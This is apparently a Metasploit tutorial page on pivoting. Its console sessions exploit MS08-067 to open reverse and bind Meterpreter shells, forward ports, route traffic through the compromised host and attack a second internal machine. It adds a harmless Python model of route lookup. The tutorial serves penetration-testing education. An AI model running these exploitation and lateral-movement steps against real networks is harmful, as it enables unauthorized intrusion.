Pivoting
The Metasploit Framework supports a basic form of pivoting through the Meterpreter payload. Pivoting is limited to Windows targets and supports only outbound TCP connections. As of version 3.3.2 the pivoting functionality in Metasploit is robust enough for common tasks. The first step in using pivoting is to gain access to a system with the Meterpreter payload. The example below demonstrates the process of exploiting the MS08-067 Server Service flaw on a Windows XP system.
```
$ msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.136
msf exploit(ms08_067_netapi) > set LPORT 4444
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.141
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Unknown
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.136:4444 -> 192.168.0.141:1042)
meterpreter >
```
Once a Meterpreter session is active, we have the ability to relay TCP connections through the target machine. If you have compromised an internal system and would like to reach an internal web server, the portfwd command does the trick:
```
meterpreter > portfwd add -l 8000 -p 80 -r 10.0.0.1
[*] Local TCP relay created: 0.0.0.0:8000 <-> 10.0.0.1:80
```
At this point a new listener is exposed on the system running Metasploit that forwards all traffic to the specified host and port through the target. If we point our browser at http://127.0.0.1:8000/, the connection is relayed across the Meterpreter session (over SSL since 3.3) to the internal server, and the internal web page is displayed locally. The portfwd command can be used with any TCP-based service on the target's network and is a great way to demonstrate access to internal resources once an internal user's machine has been compromised.
Instead of using the portfwd command directly, we can use the route command built into the Metasploit console. First we need to place the Meterpreter session into the background:
```
meterpreter > background
msf >
```

Then we use the route command to tell the framework that all communications should be relayed through the Meterpreter session:

```
msf > route add 0.0.0.0 0.0.0.0 1
```

We can verify that the route is working using the connect command from the console:

```
msf > connect 10.0.0.1 80
GET / HTTP/1.0

HTTP/1.0 200 OK
< html data >
```
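To make the route semantics concrete, here is an added Python model of the console's route table (example code written for this page, not Metasploit's own Rex::Socket::SwitchBoard). It assumes the lookup rule is longest-prefix match, so a catch-all `0.0.0.0 0.0.0.0` route like the one above is used only when no more specific route covers the destination, and a destination with no matching route is connected to directly.

```python
"""Added model of `route add <subnet> <netmask> <session>` and route lookup.
Assumes longest-prefix matching; not the framework's own implementation."""
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Route:
    network: ipaddress.IPv4Network   # subnet + netmask, e.g. 10.0.0.0/24
    session: int                     # Meterpreter session id to relay through


class RouteTable:
    """Mimics the console's route table for deciding which session relays."""

    def __init__(self) -> None:
        self.routes: list[Route] = []

    def add(self, subnet: str, netmask: str, session: int) -> Route:
        # strict=False lets "10.0.0.5 255.255.255.0" mean 10.0.0.0/24
        net = ipaddress.IPv4Network(f"{subnet}/{netmask}", strict=False)
        route = Route(net, session)
        self.routes.append(route)
        return route

    def remove(self, subnet: str, netmask: str, session: int) -> bool:
        """Drop a route; returns True when something was actually removed."""
        net = ipaddress.IPv4Network(f"{subnet}/{netmask}", strict=False)
        before = len(self.routes)
        self.routes = [r for r in self.routes
                       if not (r.network == net and r.session == session)]
        return len(self.routes) != before

    def session_for(self, dest: str) -> Optional[int]:
        """Session id of the most specific route covering dest, or None when
        no route matches (a direct connection from the attacker's host)."""
        addr = ipaddress.IPv4Address(dest)
        matches = [r for r in self.routes if addr in r.network]
        if not matches:
            return None
        return max(matches, key=lambda r: r.network.prefixlen).session


if __name__ == "__main__":
    table = RouteTable()
    table.add("0.0.0.0", "0.0.0.0", 1)          # the catch-all from the page
    table.add("10.0.0.0", "255.255.255.0", 2)   # constructed second session
    print(table.session_for("10.0.0.2"), table.session_for("172.16.1.1"))
```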
Once a route has been created, we can relay attacks through the established Meterpreter session and compromise internal machines. Since the pivoting feature supports only outbound TCP connections, we need to use the bind_tcp stagers if the internal machine has no direct access to the attacking system. In most cases, where the network has no egress filters, the reverse_tcp stagers work fine (make sure LHOST is your real external IP address). The example below demonstrates the compromise of an internal machine through a relayed session.
```
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LPORT 8989
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.2
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 Service Pack 4 with MS05-010+ - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 2 opened (192.168.0.136-192.168.0.141:0 -> 10.0.0.2:8989)
meterpreter >
```